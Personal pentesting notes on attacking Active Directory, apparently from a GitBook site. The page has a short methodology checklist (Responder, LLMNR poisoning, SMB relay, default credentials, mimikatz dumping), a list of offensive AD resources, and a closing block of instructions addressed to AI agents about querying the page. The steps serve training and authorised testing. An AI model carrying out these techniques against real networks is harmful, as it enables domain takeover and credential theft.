# Attacking Active Directory *Note: This documentation is mostly made from my notes on* [*TCM Security Academy*](https://academy.tcm-sec.com/)\ \&#xNAN;*It will be complemented with notes from my practice and from other classes like the one from* [*HTB Academy*](https://academy.hackthebox.com/) ## Methodology * Useful tool to install in kali is [pimpmykali](https://github.com/Dewalt-arch/pimpmykali) (choose 0 in option menu) * First thing to do is launch responder (along with scans to generate traffic) * LLMNR Poisoning * SMB Relay Attack * Look for websites in scope * Check for default credentials (printers, tomcat, jenkins,...) * Compromise a machine (as many as possible with lateral movement) * Enumerate (network) with tools for post-compromise attack * Get Domain Admin with post-compromise attacks * Dump with mimikatz ## Resources {% embed url="" %} An Amazing offensive AD interactive Cheat sheet by John Woodman {% endembed %} {% embed url="" %} Hacktricks - Active Directory Methodology {% endembed %} {% embed url="" %} TCM-Security Academy {% endembed %} {% embed url="" %} Top Five Ways I Got Domain Admin - Adam Toscher {% endembed %} {% embed url="" %} Active Directory Security Blog {% endembed %} {% embed url="" %} Harmj0y Blog {% endembed %} {% embed url="" %} Top Five Ways I Got Domain Admin on Your Internal Network before Lunch (2018 Edition) Adam Toscher {% endembed %} {% embed url="" %} Active Directory Attacks - PayloadsAllTheThings {% endembed %} {% embed url="" %} Azure AD - Attack and Defense Playbook - Cloud Architekt {% endembed %} {% embed url="" %} Active Directory Exploitation Cheat Sheet - Integration IT {% endembed %} {% embed url="" %} Cheat Sheet - Attack Active Directory - drak3hft7 {% endembed %} {% embed url="" %} Active Directory Exploitation Cheat Sheet - S1ckB0y1337 {% endembed %} {% embed url="" %} Pentesting active directory - Orange Cyberdéfense {% endembed %} {% embed url="" %} BUILDING AND ATTACKING AN ACTIVE DIRECTORY LAB WITH POWERSHELL - 1337RED {% endembed %} {% embed url="" %} GOAD (Game Of Active Directory) - Orange Cyberdéfense {% endembed %} {% embed url="" %} Attack Methods for Gaining Domain Admin Rights in Active Directory - Sean Metcalf - adsecurity {% endembed %} {% embed url="" %} hackndo - Pixis {% endembed %} {% embed url="" %} The Hacker Recipes - Shutdown {% endembed %} {% embed url="" %} Dirk-jan Mollema's blog {% endembed %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://csbygb.gitbook.io/pentips/windows/attacking-ad.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.